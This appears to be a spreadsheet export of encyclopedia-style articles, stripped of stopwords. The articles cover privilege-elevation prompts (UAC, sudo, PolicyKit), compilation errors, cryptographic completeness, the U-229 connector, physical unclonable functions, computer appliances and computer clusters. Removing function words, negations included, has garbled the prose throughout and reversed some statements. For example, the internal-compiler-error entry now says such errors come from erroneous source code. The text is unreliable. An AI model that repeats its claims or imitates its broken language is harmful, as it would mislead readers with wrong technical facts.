feature uac's secure desktop compromised disabled, malicious applications could gain administrator privileges using keystroke logging record administrator's password; case running administrator, spoofing mouse click "allow" button. reason, voice recognition also prohibited interacting dialog. note since gksu password prompt runs without special privileges, malicious applications still keystroke logging using e.g. strace tool. (ptrace restricted later kernel versions) fake authentication dialogs another security consideration ability malicious software spoof dialogs look like legitimate security confirmation requests. user input credentials fake dialog, thinking dialog legitimate, malicious software would know user's password. secure desktop similar feature disabled, malicious software could password gain higher privileges. though default behavior usability reasons, configured require user press ctrl+alt+del (known secure attention sequence) part authentication process. because windows detect combination, requiring additional security measure would prevent spoofed dialogs behaving legitimate dialog. example, spoofed dialog might user press ctrl+alt+del, user could realize dialog fake. user press ctrl+alt+del, user would brought screen ctrl+alt+del normally brings instead confirmation dialog. thus user could tell whether dialog attempt trick providing password piece malicious software. gnome, policykit uses different dialogs, depending configuration system. example, authentication dialog system equipped fingerprint reader might look different authentication dialog system without one. applications access configuration policykit, knowing dialog appear thus spoof usability considerations another consideration gone implementations usability. separate administrator account require user know password least accounts: regular-use account, account higher privileges root. sudo, kdesu gksudo simpler approach. with programs, user pre-configured granted access specific administrative tasks, must explicitly authorize applications privileges. user enters password instead superuser another account. authenticate combine ideas one. with programs, administrators explicitly authorize programs higher privileges. non-administrators prompted administrator username password. policykit configured adopt approaches. practice, distribution choose one. simplicity dialog order grant application administrative privileges, sudo, gksudo, authenticate prompt administrators re-enter password. with uac, logged standard user, user must enter administrator's name password time need grant application elevated privileges; logged member administrators group, default) simply confirm deny, instead re-entering password time (though option). while default approach simpler, also less secure, since user physically walks away computer without locking another person could walk administrator privileges system. policykit requires user re-enter password provide means authentication (e.g. fingerprint). saving credentials prompts authorization time called elevate program. sudo, gksudo, kdesu user re-enter password every time called elevate program. rather, user asked password start. user used administrative privileges certain period time (sudo's default minutes), user restricted standard user privileges enter password again.sudo's approach trade-off security usability. hand, user enter password perform series administrator tasks, rather enter password task. time, surface area attack larger programs (for sudo) programs running terminal (for gksudo kdesu) prefixed either commands timeout receive administrator privileges. security-conscious users remove temporary administrator privileges upon completing tasks requiring using sudo command sudo used case pts's, closing terminal emulator sufficient). equivalent command kdesu kdesu there gksudo option same; however, running sudo within terminal instance (e.g. "run application" dialogue box, unticking "run terminal") desired effect.authenticate save passwords. user standard user, must enter username password. user administrator, current user's name already filled needs enter password. name still modified another user.the application requires authentication once, requested time application needs privilege. once "elevated", application need authenticate application quit relaunched.however, varying levels authentication, known rights. right requested shown expanding triangle next "details", underneath password. normally, applications system.privilege.admin, another used, lower right security, higher right higher access needed. right application suitable task, application need authenticate increase privilege level.policykit configured adopt either approaches. identifying administrative rights needed order operating system know prompt user authorization, application action needs identify requiring elevated privileges. while technically possible user prompted exact moment operation requiring privileges executed, often ideal privileges partway completing task. user unable provide proper credentials, work done requiring administrator privileges would undone task could seen end. case user interfaces control panel microsoft windows, preferences panels exact privilege requirements hard-coded system user presented authorization dialog appropriate time (for example, displaying information administrators see). different operating systems offer distinct methods applications identify security requirements: sudo centralizes privilege authorization information single configuration file, /etc/sudoers, contains list users privileged applications actions users permitted use. grammar sudoers file intended flexible enough cover many different scenarios, placing restrictions command-line parameters. example, user granted access change anybody's password except root account, follows: pete /usr/bin/passwd [a-z]*, !/usr/bin/passwd root user account control uses combination heuristic scanning "application manifests" determine application requires administrator privileges. manifest (.manifest) files, first introduced windows files name application suffix ".manifest", e.g. notepad.exe.manifest. when application started, manifest looked information security requirements application has. example, fragment indicate application require administrator access, require unfettered access parts user desktop outside application: manifest files also compiled application executable embedded resource. heuristic scanning also used, primarily backwards compatibility. example looking executable's file name; contains word "setup", assumed executable installer, prompt displayed application starts.uac also makes distinction elevation requests signed executable unsigned executable; former, whether publisher 'windows vista'. color, icon, wording prompts different case: example, attempting convey greater sense warning executable unsigned not.applications using policykit specific privileges prompting authentication, policykit performs actions behalf application. before authenticating, users able application requested action action requested. also privilege escalation, type security exploit principle least privilege, security design pattern privileged identity management, methodology managing privileged accounts privileged password management, similar concept privileged identity management: i.e., periodically scramble privileged passwords; store password values secure, highly available vault; apply policy regarding when, passwords disclosed. references</t>
  </si>
  <si>
    <t>Compilation error</t>
  </si>
  <si>
    <t>compilation error refers state compiler fails compile piece computer program source code, either errors code, unusually, errors compiler itself. compilation error message often helps programmers debugging source code. although definitions compilation interpretation vague, generally compilation errors refer static compilation dynamic compilation. however, dynamic compilation still technically compilation errors, although many programmers sources identify run-time errors. most just-in-time compilers, javascript engine, ambiguously refer compilation errors syntax errors since check time. examples common compilation errors undeclared identifier, e.g.:doy.cpp: function `int main()': doy.cpp:25: `dayofyear' undeclared (first function)this means variable "dayofyear" trying used declared. common function undeclared, e.g.:xyz.cpp: function `int main()': xyz.cpp:6: `cout' undeclared (first function)this means programmer likely forgot include iostream. parse error, e.g.:somefile.cpp:24: parse error `something'this could mean semi-colon missing previous statement. internal compiler errors internal compiler error (commonly abbreviated ice) error occurs erroneous source code, rather compiler itself. they sometimes worked around making small, insignificant changes source code around line indicated error line indicated all), sometimes larger changes must made, refactoring code, avoid certain constructs. using different compiler different version compiler solve issue acceptable solution cases. when internal compiler error reached many compilers output standard error, instead output shortened version, additional files attached, provided internal compiler errors. this order insure program crash logging error, would make solving error nigh impossible. additional files attached internal compiler errors usually special formats save .dump java. these formats generally difficult analyze regular files, still helpful information solving causing crash.example internal compiler error: somefile.c:1001: internal compiler error: segmentation fault please submit full report, preprocessed source appropriate. &lt;http://bugs.gentoo.org/&gt; instructions. references</t>
  </si>
  <si>
    <t>Completeness (cryptography)</t>
  </si>
  <si>
    <t>cryptography, boolean function said complete value output depends input bits. this desirable property encryption cipher, input (plaintext) changed, every output (ciphertext) average probability changing. easiest show good following: consider changed 8-byte plaintext's last byte, would effect byte ciphertext. this would mean attacker guessed different plaintext-ciphertext pairs, would always know last byte every 8byte sequence send (effectively 12.5% data). finding plaintext-ciphertext pairs hard internet world, given standard protocols used, standard protocols standard headers commands (e.g. "get", "put", "mail from:", etc.) attacker safely guess. hand, cipher property (and generally secure ways, too), attacker would need collect (~1020) plaintext-ciphertext pairs crack cipher way. also correlation immunity</t>
  </si>
  <si>
    <t>U-229</t>
  </si>
  <si>
    <t>u-229 cable connector currently used u.s. military audio connections field radios, typically connecting handset. there five-pin six-pin versions, sixth version using extra power accessories. this type connector also used national security agency load cryptographic keys encryption equipment fill device. specified detail specification mil-dtl-55116d external links u-229 pin-outs information mil-dtl-55116 military specification compilation military radio related standards</t>
  </si>
  <si>
    <t>Types of physical unclonable function</t>
  </si>
  <si>
    <t>physical unclonable function (puf), sometimes also called physically unclonable function, physical entity embodied physical structure easy evaluate hard predict. pufs subject environmental variations temperature, supply voltage electromagnetic interference, affect performance. therefore, rather random, real power ability different devices, simultaneously different environmental conditions. categorization measurement process categorise numerous concepts source variation within measured. instance pufs examine source uniqueness interacts with, influences, electronic signal derive signature measurement others examine effects reflection incident light, another optical process. this also typically correlates intended application concept. example, pufs probe uniqueness electronic characterization suitable authenticating electronic circuits components ease integration. hand, pufs authenticate physical objects tend probe using second process, optical radio frequency methods, converted electronic signal forming hybrid measurement system. this allows easier communication distance separate physical authenticating object evaluating device. randomness source major pufs categorized based examining randomness variation device derived. this source uniqueness either applied explicit manner, deliberate addition extra manufacturing steps, occurring implicit manner, part typical manufacture processes. example, case electronic pufs manufactured cmos, adding additional cmos components possible without introducing extra fabrication steps, would count implicit source randomness, would deriving randomness components already part design start with. adding, example, randomized dielectric coating sole purpose fingerprinting would additional manufacturing steps would make concept implementation fall explicit category. implicit randomness sources show benefit additional costs associated introducing manufacturing steps, randomness derived inherent variation device’s typical manufacture process cannot directly manipulated. explicit randomness sources show benefit source randomness deliberately chosen, instance maximize variation (and therefore entropy yield) increase cloning difficulty (for example harnessing randomness smaller feature sizes). intrinsic evaluation similar manner classification randomness source, concepts divided whether evaluate intrinsic manner. described intrinsic randomness implicit origin evaluate internally. this means mechanism characterizing intrinsic embedded within, evaluating device itself. this property currently held pufs entirely electronic design, evaluation processing done involvement electronic circuitry, therefore inseparable electronic randomness probing mechanism. intrinsic evaluation beneficial allow evaluation processing post-processing (such error correction hashing) occur without unprocessed readout exposed externally. this incorporation randomness characterization evaluation processing unit reduces risk man-in-the-middle side-channel attacks aimed communication areas. electronic-measurement pufs implicit randomness technology based "via" "contact" formation standard cmos fabrication process. technology outcome reverse thinking process. rather meeting design rules, makes sizes contact smaller requirements controlled manner, resulting unpredictable stochastic formation contact, i.e. probability making electrical connection. technology details published 2020 first time technology already mass production 2016 ictk holdings. characteristics followings: reliability: thanks metallic property, "via" "contact" formed structure, stay nearly permanently regardless variation, means error rate thus post processing stages error correction code helper data algorithm required. technology verified jedec standard tests passed automotive electronics council q-100 grade test automotive applications. randomness achieves 0.4972 hamming weight closed ideal value 0.5. technology passed nist special publication 800-92 nist 800-90b randomness tests. uniqueness ‘inbornid’: uniqueness important property since would guarantee chip always different chips. reports 0.4999 hamming distance value closed ideal uniqueness 0.5. 'inbornid' stands on-chip unique ‘inborn’ silicon chip. obscurity great advantages using technology implementation. contact holes scattered around chip. need form array blocks like sram puf. practically impossible distinguish vias regular logic vias, making reverse engineering almost impossible. standard manufacturing process: technology uses standard cell structures standard digital library regular core voltage. high voltage, special circuitry like charge pump. there extra mask layer required manufacturing process.the based hardware (root trust) chips currently applied various markets telecommunications, appliances, devices forms wifi/ble modules, smart door locks, cameras, sensor hub, etc. technology supports security functionalities anti-counterfeiting, secure boot, secure firmware copy protection, secure firmware update secure data integrity. delay delay exploits random variations delays wires gates silicon. given input challenge, race condition circuit, transitions propagate along different paths compared comes first. arbiter, typically implemented latch, produces depending transition comes first. many circuits realizations possible least fabricated. when circuit layout mask fabricated different chips, logic function implemented circuit different chip random variations delays. based delay loop, i.e., ring oscillator logic, publication introduced acronym first integrated type. multiplexor-based described, secure processor design using multiplexor-based interface rfid anti-counterfeiting applications. sram these pufs randomness power-up behavior standard static random-access memory chip puf. sram introduced 2007 simultaneously researchers philips high tech campus university massachusetts. since sram connected directly standard digital circuitry embedded chip, immediately deployed hardware block cryptographic implementations, making particular interest security solutions. sram-based technology investigated extensively. several research papers explore sram-based technology topics behavior, implementation, application anti-counterfeiting purposes. notable implementation secure secret storage without storing digital form. sram puf-based cryptographic implementations commercialized intrinsic spin-out philips, 2019, available every technology node deep submicron manufacturing process variations, every transistor integrated circuit (ic) slightly different physical properties. these lead small differences electronic properties, transistor threshold voltages gain factor. start-up behavior sram cell depends difference threshold voltages transistors. even smallest differences push sram cell stable states. given every sram cell preferred state every time powered, sram response yields unique random pattern zeros ones. this pattern like chip’s fingerprint, since unique particular sram hence particular chip. post-processing sram sram response noisy fingerprint since small number cells, close equilibrium unstable. order sram reliably unique identifier extract cryptographic keys, post-processing required. this done applying error correction techniques, ‘helper data algorithms’ fuzzy extractors. these algorithms perform main functions: error correction privacy amplification. this approach allows device create strong device-unique secret sram power secret present. using helper data, exact regenerated sram needed. aging sram operational slowly gradually changes time, i.e. ages. dominant aging effect modern time large impact noisy behavior sram nbti. since nbti well understood, several ways counteract aging tendency. anti-aging strategies developed cause sram become reliable time, without degrading quality measures security efficiency. sram commercial applications sram pufs initially used applications high security requirements, defense, protect sensitive government military systems, banking industry, secure payment systems financial transactions. 2010, started using sram technology secure smartmx-powered assets cloning, tampering, theft-of-service reverse engineering. since 2011, microsemi offering sram implementations security secure government sensitive commercial applications company's flash-based devices development boards. more recent applications include: secure sensor-based authentication system iot, incorporation risc-v-based application processors secure intelligent, battery-operated sensing devices edge, replacement traditional otp-plus-key-injection approaches security high-volume, low-power microcontrollers crossover processors.some sram-based security systems 2000s refer "chip identification" rather standard term "puf." research community industry largely embraced term describe space technology. butterfly butterfly based cross-coupling latches flip-flops. mechanism used similar behind sram advantage implemented sram fpga. metal resistance metal resistance-based derives entropy random physical variations metal contacts, vias wires define power grid interconnect there several important advantages leveraging random resistance variations metal resources including: temperature voltage stability: temperature voltage (tv) variations represent significant challenges pufs applications require re-generation exactly bitstring later time, e.g., encryption. metal resistance (unlike transistors) varies linearly temperature independent voltage. therefore, metal resistance provides high level robustness changing environmental conditions. ubiquity: metal (currently) conducting material chip layered, effectively enabling high density, compact, entropy sources. advanced processes create metal layers (x,y) plane underlying transistors. reliability: wear-out mechanism metal electro-migration, like variations, adversely affects ability reproduce bitstring time. however, electro-migration process well understood completely avoided proper sizing metal wires, vias contacts. transistor reliability issues, e.g., nbti (negative-bias temperature instability) hci, hand, difficult mitigate. resiliency: recent reports shown transistor-based pufs, particular sram puf, subject cloning. metal resistance pufs subject types cloning attacks high complexity associated 'trimming' wires clone means matching resistances. moreover, adding shielding layers thicker upper metal layers overlay underlying (which built using lower metal layers), front-side probing attacks designed extract metal resistances clone extremely difficult impossible. bistable ring bistable ring br-puf introduced chen br-puf based idea ring even number inverters possible stable states. duplicating inverters adding multiplexers stages, possible generate exponentially large number challenge-response pairs br-puf. dram since many computer systems form dram board, drams used effective system-level puf. dram also much cheaper static (sram). thus, dram pufs could source random reliable data generating board identifications (chip id). advantage dram based fact stand-alone dram already present system chip used generating device-specific signatures without requiring additional circuitry hardware. tehranipoor presented first dram uses randomness power-up behavior dram cells. other types dram pufs include ones based data retention dram cells, effects changing write read latency times used drams. digital digital overcomes vulnerability issues conventional analog silicon pufs. unlike analog pufs fingerprints come transistors' intrinsic process variation natures, fingerprints digital circuit pufs extracted vlsi interconnect geometrical randomness induced lithography variations. such interconnection uncertainty however incompatible cmos vlsi circuits issues like short circuit, floating gate voltages etc. transistors. solution strongly skewed latches ensure stable operating state cmos transistor hence ensuring circuit immune environmental operational variations. oxide rupture oxide rupture type benefiting randomness obtained inhomogeneous natural gate oxide properties occurring manufacturing process. along truly random, un-predictable highly stable properties, ideal source physical unclonable function. design houses strongly enhance security level implementing oxide rupture design, without concerns reliability life time issue additional costs complicated (error correction code) circuits. oxide rupture extract uniformly-distributed binary bits amplification self-feedback mechanism, random bits activated upon enrollment, large entropy pool, users provided desired flexibility choose key-generation management approaches. security level upgraded oxide rupture puf's intrinsic truly randomness invisible features. explicit randomness coating coating built layer integrated circuit (ic). above normal network metal wires laid comb shape. space comb structure filled opaque material randomly doped dielectric particles. because random placement, size dielectric strength particles, capacitance couple metal wires random certain extent. this unique randomness used obtain unique identifier device carrying coating puf. moreover, placement opaque layer protects underlying circuits inspected attacker, e.g. reverse-engineering. when attacker tries remove part coating, capacitance wires bound change original unique identifier destroyed. shown unclonable rfid built coating pufs. quantum electronic size system reduced broglie wavelength, effects quantum confinement become extremely important. intrinsic randomness within quantum confinement originates compositional structural non-uniformities atomic level. physical characteristics dependent effects quantum mechanics scale, whilst quantum mechanics dictated random atomic structure. cloning type structure practically impossible large number atoms involved, uncontrollable nature processes atomic level inability manipulate atoms reliably. shown quantum confinement effects used construct puf, devices known resonant-tunneling diodes. these devices produced standard semiconductor fabrication processes, facilitating mass-production many devices parallel. this type requires atom-level engineering clone smallest, highest density known date. furthermore, type could effectively reset purposely overbiasing device cause local rearrangement atoms. hybrid-measurement pufs implicit randomness magnetic magnetic exists magnetic stripe card. physical structure magnetic media applied card fabricated blending billions particles barium ferrite together slurry manufacturing process. particles many different shapes sizes. slurry applied receptor layer. particles land random fashion, much like pouring handful magnetic sand onto carrier. pour sand land exactly pattern second time physically impossible inexactness process, sheer number particles, random geometry shape size. randomness introduced manufacturing process cannot controlled. this classic example using intrinsic randomness. when slurry dries, receptor layer sliced strips applied plastic cards, random pattern magnetic stripe remains cannot changed. because physically unclonable functions, highly improbable magnetic stripe cards ever identical. using standard-sized card, odds cards exact matching magnetic calculated million. further, magnetic, card carry distinctive, repeatable readable magnetic signal. personalizing magnetic puf: personal data encoded magnetic stripe contributes another layer randomness. when card encoded personal identifying information, odds encoded magstripe cards identical magnetic signature approximately billion. encoded data used marker locate significant elements puf. this signature digitized generally called magnetic fingerprint. example magneprint brand system. stimulating magnetic puf: magnetic head acts stimulus amplifies random magnetic signal. because complex interaction magnetic head, influenced speed, pressure, direction acceleration, random components puf, swipe head magnetic yield stochastic, distinctive signal. think song thousands notes. odds notes recurring exact pattern single card swiped many times million, overall melody remains recognizable. uses magnetic puf: stochastic behavior concert stimulus head makes magnetic stripe card excellent tool dynamic token authentication, forensic identification, generation, one-time passwords, digital signatures. explicit randomness optical optical termed powf (physical one-way function) consists transparent material doped light scattering particles. when laser beam shines material, random unique speckle pattern arise. placement light scattering particles uncontrolled process interaction laser particles complex. therefore, hard duplicate optical speckle pattern arise, hence postulation "unclonable". quantum optical leveraging quantum derived difficulty clone quantum electronic puf, quantum operating optical regime devised. imperfections created crystal growth fabrication lead spatial variations bandgap materials characterized photoluminescence measurements. shown angle-adjustable transmission filter, simple optics camera capture spatially-dependent photoluminescence produce complex maps unique information monolayers. digitally modulated data modern communication circuits subjected device-specific unique analog/rf impairments frequency error/offset imbalance transmitter), typically compensated receiver rejects non-idealities. rf-puf, rf-dna utilize existing non-idealities distinguish among transmitter instances. rf-puf additional hardware transmitter used stand-alone physical-layer security feature, multi-factor authentication, conjunction network-layer, transport-layer application-layer security features. references</t>
  </si>
  <si>
    <t>Computer appliance</t>
  </si>
  <si>
    <t>computer appliance home appliance software firmware specifically designed provide specific computing resource. such devices became known appliances similarity role management home appliance, generally closed sealed, serviceable user owner. hardware software delivered integrated product even pre-configured delivery customer, provide turn-key solution particular application. unlike general purpose computers, appliances generally designed allow customers change software underlying operating system, flexibly reconfigure hardware. another form appliance virtual appliance, similar functionality dedicated hardware appliance, distributed software virtual machine image hypervisor-equipped device. overview traditionally, software applications general-purpose operating system, uses hardware resources computer (primarily memory, disk storage, processing power, networking bandwidth) meet computing needs user. main issue traditional model related complexity. complex integrate operating system applications hardware platform, complex support afterwards. tightly constraining variations hardware software, appliance becomes easily deployable, used without nearly wide deep) knowledge. additionally, problems errors appear, supporting staff rarely needs explore deeply understand matter thoroughly. staff needs merely training appliance management software able resolve problems. forms computer appliance model, customers benefit easy operations. appliance exactly combination hardware operating system application software, pre-installed factory. this prevents customers needing perform complex integration work, dramatically simplifies troubleshooting. fact, "turnkey operation" characteristic driving benefit customers seek purchasing appliances. considered appliance, (hardware) device needs integrated software, supplied package. this distinguishes appliances "home grown" solutions, solutions requiring complex implementations integrators value-added resellers (vars). appliance approach helps decouple various systems applications, example data center. once resource decoupled, theory also centralized become shared among many systems, centrally managed optimized, without requiring changes system. tradeoffs computer appliance approach major disadvantage deploying computer appliance since designed supply specific resource, often include customized operating system running specialized hardware, neither likely compatible systems previously deployed. customers lose flexibility. believe proprietary embedded operating system, operating system within application, make appliance much secure common cyber attacks. however, opposite true. security obscurity poor security decision, appliances often plagued security issues evidenced proliferation devices. types appliances variety computer appliances reflects wide range computing resources provide applications. some examples: storage appliances provide massive amounts storage additional higher level functionality (ex: disk mirroring data striping) multiple attached systems using transparent local storage area networks computer paradigm. network appliances general purpose routers provide firewall protection, transport layer security (tls), messaging, access specialized networking protocols (like ebxml message service) bandwidth multiplexing multiple systems front-end. backup disaster recovery appliances computer appliances integrated backup software backup targets, sometimes hypervisors support local protected servers. they often gateway full draas solution. firewall- security appliances computer appliances designed protect computer networks unwanted traffic. iiot gateway appliances computer appliances designed translate data bidirectionally control systems enterprise systems. proprietary, embedded, firmware applications running appliance point-to-point connections translate data field devices native automation protocols systems apis, odbc, restful interfaces. anti-spam appliances e-mail spam software appliances software application might combined enough operating system (jeos) industry standard hardware virtual machine. essence, software distribution firmware running computer appliance. virtual machine appliances consist "hypervisor style" embedded operating system running appliance hardware. hypervisor layer matched hardware appliance, cannot varied customer, customer load operating systems applications onto appliance form virtual machines. consumer appliances aside deployment within data centers, many computer appliances directly used general public. these include: digital video recorder residential gateway network-attached storage (nas) video game consoleconsumer uses stress need appliance easy installation, configuration, operation, little technical knowledge necessary. appliances industrial automation world industrial automation rich appliances. these appliances hardened withstand temperature vibration extremes. these appliances also highly configurable, enabling customization meet wide variety applications. benefits appliance automation are: reduced downtime failed appliance typically replaced cots "commercial off-the-shelf" replacement task quickly easily reloaded backup. highly scalable appliances typically targeted solutions area plant process. requirements change, scalability achieved installation another appliance. automation concepts easily replicated throughout enterprise standardizing appliances perform needed tasks, opposed development custom automation schemes task. (total cost ownership) appliances developed, tested supported automation product vendors undergo much broader level quality testing custom designed automation solutions. appliances automation reduce level testing needed individual application. reduced design time appliances perform specific functions although highly configurable, typically self documenting. this enables appliance based solutions transferred engineer engineer minimal need training documentation.types automation appliances: (programmable logic controller) programmable logic controllers appliances typically used discrete control offer wide range input output options. they configured standardized programming languages iec-1131. (single loop controller) single loop controllers appliances monitor input variable effect change control output (manipulated variable) hold input variable setpoint. (programmable automation controller) programmable automation controllers appliances embody properties plcs slcs enabling integration analog discrete control. universal gateway universal gateway appliance ability communicate variety devices respective communication protocols, affect data transactions them. this increasingly important manufacturing strives improve agility, quality, production rates, production costs reduce downtime enhanced (machine machine) communications. eatms (enterprise appliance transaction modules) enterprise appliance transaction modules appliances affect data transactions plant floor automation systems enterprise business systems. they communicate plant floor equipment various vendor automation protocols, communicate business systems database communication protocols (java message service) (structured query language). internal structure there several design patterns adopted computer appliance vendors, shown below. since whole concept appliance rests keeping implementation details away user, difficult match patterns specific appliances, particularly since change without affecting external capabilities performance. special chip vendor builds asic, without separate "software" operating system. appliance limited interface, usually terminal console web-based, allow basic configuration staff. manufacturer often provides accessing deeper configuration mechanisms. azul systems' vega java compute appliance example; special hardware modifications chip enable java application scaling. special software kernel vendor uses creates general-purpose computer, designs operating system integrates application operating system. cisco's example; unix-like operating system firewall functions network/firewall configuration commands built sometimes, device also sealed, consumer access reinstall operating system replace another operating system. consumer also restricted small group configuration commands, detailed lower level functions operating system available vendor. "locked down" approach carried out, closer type device comes appearing like asic device. specialized application off-the-shelf computers operating systems used, user interface "box" designed user cannot access anything computer, except application interface vendor created. since underlying computing architecture locked essentially invisible, becomes difficult discern device really functions general purpose hardware operating systems. linux, lesser degree, become operating system choice type appliance. recently term software appliance also used describe pre-packaged, black-box combination. virtual appliance hardware disappeared entirely become so-called virtual appliance (also known virtual software appliance) using number virtual machine technologies. within virtual machine essentially stack software plus operating system "specialized application" alternative.sometimes, techniques mixed. example, appliance might contain limited access software firewall running linux, encryption asic speed access. some computer appliances solid state storage, others hard drive load operating system. again, methods might mixed—an asic print server might allow optional hard drive queueing, linux-based device encode linux firmware, hard drive needed load operating system. also automotive navigation system green computing hardware acceleration information appliance linux devices personal digital assistant (pda) plug computer smartphone software appliance middlebox references external links advisory group comments enterprise appliance transaction modules computing appliances monash report, 2006</t>
  </si>
  <si>
    <t>Computer cluster</t>
  </si>
  <si>
    <t>computer cluster computers work together viewed single system. unlike grid computers, computer clusters node perform task, controlled scheduled software. components cluster usually connected fast local area networks, node (computer used server) running instance operating system. circumstances, nodes hardware operating system, although setups (e.g. using open source cluster application resources (oscar)), different operating systems used computer, different hardware.clusters usually deployed improve performance availability single computer, typically much cost-effective single computers comparable speed availability.computer clusters emerged result convergence number computing trends including availability low-cost microprocessors, high-speed networks, software high-performance distributed computing. they wide range applicability deployment, ranging small business clusters handful nodes fastest supercomputers world ibm's sequoia. prior advent clusters, single unit fault tolerant mainframes modular redundancy employed; lower upfront cost clusters, increased speed network fabric favoured adoption clusters. contrast high-reliability mainframes clusters cheaper scale out, also increased complexity error handling, clusters error modes opaque running programs. basic concepts desire computing power better reliability orchestrating number low-cost commercial off-the-shelf computers given rise variety architectures configurations. computer clustering approach usually (but always) connects number readily available computing nodes (e.g. personal computers used servers) fast local area network. activities computing nodes orchestrated "clustering middleware", software layer sits atop nodes allows users treat cluster large cohesive computing unit, e.g. single system image concept.computer clustering relies centralized management approach makes nodes available orchestrated shared servers. distinct approaches peer-to-peer grid computing also many nodes, distributed nature.a computer cluster simple two-node system connects personal computers, fast supercomputer. basic approach building cluster beowulf cluster built personal computers produce cost-effective alternative traditional high-performance computing. early project showed viability concept 133-node stone soupercomputer. developers used linux, parallel virtual machine toolkit message passing interface library achieve high performance relatively cost.although cluster consist personal computers connected simple network, cluster architecture also used achieve high levels performance. top500 organization's semiannual list fastest supercomputers often includes many clusters, e.g. world's fastest machine 2011 computer distributed memory, cluster architecture. history greg pfister stated clusters invented specific vendor customers could work computer, needed backup. pfister estimates date time 1960s. formal engineering basis cluster computing means parallel work sort arguably invented gene amdahl ibm, 1967 published come regarded seminal paper parallel processing: amdahl's law. history early computer clusters less directly tied history early networks, primary motivations development network link computing resources, creating facto computer cluster. first production system designed cluster burroughs b5700 mid-1960s. this allowed four computers, either processors, tightly coupled common disk storage subsystem order distribute workload. unlike standard multiprocessor systems, computer could restarted without disrupting overall operation. first commercial loosely coupled clustering product datapoint corporation's "attached resource computer" (arc) system, developed 1977, using arcnet cluster interface. clustering really take digital equipment corporation released vaxcluster product 1984 operating system. vaxcluster products supported parallel computing, also shared file systems peripheral devices. idea provide advantages parallel processing, maintaining data reliability uniqueness. noteworthy early commercial clusters tandem himalayan circa 1994 high-availability product) s/390 parallel sysplex (also circa 1994, primarily business use). within time frame, computer clusters used parallelism outside computer commodity network, supercomputers began within computer. following success 6600 1964, cray delivered 1976, introduced internal parallelism vector processing. while early supercomputers excluded clusters relied shared memory, time fastest supercomputers (e.g. computer) relied cluster architectures. attributes clusters computer clusters configured different purposes ranging general purpose business needs web-service support, computation-intensive scientific calculations. either case, cluster high-availability approach. note attributes described exclusive "computer cluster" also high-availability approach, etc. "load-balancing" clusters configurations cluster-nodes share computational workload provide better overall performance. example, server cluster assign different queries different nodes, overall response time optimized. however, approaches load-balancing significantly differ among applications, e.g. high-performance cluster used scientific computations would balance load different algorithms web-server cluster simple round-robin method assigning request different node.computer clusters used computation-intensive purposes, rather handling io-oriented operations service databases. instance, computer cluster might support computational simulations vehicle crashes weather. very tightly coupled computer clusters designed work approach "supercomputing". "high-availability clusters" (also known failover clusters, clusters) improve availability cluster approach. they operate redundant nodes, used provide service system components fail. cluster implementations attempt redundancy cluster components eliminate single points failure. there commercial implementations high-availability clusters many operating systems. linux-ha project commonly used free software package linux operating system. benefits clusters primarily designed performance mind, installations based many factors. fault tolerance (the ability system continue working malfunctioning node) allows scalability, high-performance situations, frequency maintenance routines, resource consolidation (e.g. raid), centralized management. advantages include enabling data recovery event disaster providing parallel data processing high processing capacity.in terms scalability, clusters provide ability nodes horizontally. this means computers added cluster, improve performance, redundancy fault tolerance. this inexpensive solution higher performing cluster compared scaling single node cluster. this property computer clusters allow larger computational loads executed larger number lower performing computers. when adding node cluster, reliability increases entire cluster need taken down. single node taken maintenance, rest cluster takes load individual node. large number computers clustered together, lends distributed file systems raid, increase reliability speed cluster. design configuration issues designing cluster tightly coupled individual nodes instance, single computer require frequent communication among nodes: implies cluster shares dedicated network, densely located, probably homogeneous nodes. extreme computer uses nodes, needs little inter-node communication, approaching grid computing. beowulf cluster, application programs never computational nodes (also called slave computers) interact "master" specific computer handling scheduling management slaves. typical implementation master network interfaces, communicates private beowulf network slaves, general purpose network organization. slave computers typically version operating system, local memory disk space. however, private slave network also large shared file server stores global persistent data, accessed slaves needed.a special purpose 144-node degima cluster tuned running astrophysical n-body simulations using multiple-walk parallel treecode, rather general purpose scientific computations.due increasing computing power generation game consoles, novel emerged repurposed high-performance computing (hpc) clusters. some examples game console clusters sony playstation clusters microsoft xbox clusters. another example consumer game product nvidia tesla personal supercomputer workstation, uses multiple graphics accelerator processor chips. besides game consoles, high-end graphics cards used instead. graphics cards rather gpu's) calculations grid computing vastly economical using cpu's, despite less precise. however, using double-precision values, become precise work cpu's still much less costly (purchase cost).computer clusters historically separate physical computers operating system. with advent virtualization, cluster nodes separate physical computers different operating systems painted virtual layer look similar. cluster also virtualized various configurations maintenance takes place; example implementation virtualization manager linux-ha. data sharing communication data sharing computer clusters appearing 1980s, supercomputers. elements distinguished three classes time early supercomputers relied shared memory. date clusters typically physically shared memory, many supercomputer architectures also abandoned however, clustered file system essential modern computer clusters. examples include general parallel file system, microsoft's cluster shared volumes oracle cluster file system. message passing communication widely used approaches communication cluster nodes (message passing interface) (parallel virtual machine).pvm developed ridge national laboratory around 1989 available. must directly installed every cluster node provides software libraries paint node "parallel virtual machine". provides run-time environment message-passing, task resource management, fault notification. used user programs written c++, fortran, etc.mpi emerged early 1990s discussions among organizations. initial effort supported arpa national science foundation. rather starting anew, design drew various features available commercial systems time. specifications gave rise specific implementations. implementations typically tcp/ip socket connections. widely available communications model enables parallel programs written languages fortran, python, etc. thus, unlike provides concrete implementation, specification implemented systems mpich open mpi. cluster management challenges computer cluster cost administrating times high cost administrating independent machines, cluster nodes. cases provides advantage shared memory architectures lower administration costs. this also made virtual machines popular, ease administration. task scheduling when large multi-user cluster needs access large amounts data, task scheduling becomes challenge. heterogeneous cpu-gpu cluster complex application environment, performance depends characteristics underlying cluster. therefore, mapping tasks onto cores devices provides significant challenges. this area ongoing research; algorithms combine extend mapreduce hadoop proposed studied. node failure management when node cluster fails, strategies "fencing" employed keep rest system operational. fencing process isolating node protecting shared resources node appears malfunctioning. there classes fencing methods; disables node itself, disallows access resources shared disks.the stonith method stands "shoot other node head", meaning suspected node disabled powered off. instance, power fencing uses power controller turn inoperable node.the resources fencing approach disallows access resources without powering node. this include persistent reservation fencing scsi3, fibre channel fencing disable fibre channel port, global network block device (gnbd) fencing disable access gnbd server. software development administration parallel programming load balancing clusters servers cluster architectures support large number users typically user request routed specific node, achieving task parallelism without multi-node cooperation, given main goal system providing rapid user access shared data. however, "computer clusters" perform complex computations small number users need take advantage parallel processing capabilities cluster partition "the computation" among several nodes.automatic parallelization programs remains technical challenge, parallel programming models used effectuate higher degree parallelism simultaneous execution separate portions program different processors. debugging monitoring developing debugging parallel programs cluster requires parallel language primitives suitable tools discussed high performance debugging forum (hpdf) resulted specifications. tools totalview developed debug parallel implementations computer clusters message passing interface (mpi) 